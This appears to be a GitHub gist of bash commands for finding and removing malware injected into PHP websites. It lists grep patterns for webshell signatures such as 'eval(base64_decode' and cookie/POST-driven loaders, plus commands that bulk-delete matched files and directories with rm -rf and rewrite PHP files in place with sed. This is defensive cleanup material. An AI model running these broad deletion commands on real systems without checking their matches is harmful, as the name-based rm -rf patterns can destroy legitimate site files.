Skip to content

Instantly share code, notes, and snippets.

@MisterDuval

MisterDuval/infectedFiles.md

Forked from frosit/infectedFiles.md
Last active March 9, 2022 21:45
Show Gist options
  • Save MisterDuval/50560010bac176f16d60f4fc8c791fb7 to your computer and use it in GitHub Desktop.
Save MisterDuval/50560010bac176f16d60f4fc8c791fb7 to your computer and use it in GitHub Desktop.
Download ZIP
Some commands for finding and clearing infected PHP files
Raw
infectedFiles.md

Finding infected files with following bash commands

** Command to list all infected files:

  • grep -lr --include=*.php "eval(base64_decode" /path/to/webroot
  • grep -lr --include=*.php "eval" .
  • grep -lr --include=*.php "base64" .
  • grep -lr --include=*.php '@include "\\' .
  • grep -lr --include=*.php '@unserialize(@file_get_contents' .
  • grep -lr --include=*.php '($_COOKIE, $_POST) as ' .
  • find /path/to/webroot -type f -name '*.ico'

Command to remove malicious code:

  • grep -lr --include=*.php '($_COOKIE, $_POST) as ' . | xargs rm

  • grep -lr --include=*.php "eval(base64_decode" /path/to/webroot | xargs sed -i.bak 's/<?php eval(base64_decode[^;]*;/<?php\n/g'

  • grep -lr --include=*.php "eval(base64_decode" /path/to/webroot | xargs sed -i.bak '/eval(base64_decode*/d'

Trying to avoid re-appearance of this code injection

  • find /path/to/webroot -name "wp-phpmyadmin" -type d | xargs rm -rf

Missing <?php tag in the beginning:

  • find /var/www/ -name "index.php" | grep "/htdocs/index.php" | xargs grep -L "<?php" | xargs sed -i "1s/^/<?php \n/"

Extra Newlines at the top!

  • find . -name '*.php' -exec sed -i -e :a -e '/^\n*$/{$d;N;ba' -e '}' '{}' \;

  • find -name '*_input*' | xargs rm -rf

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment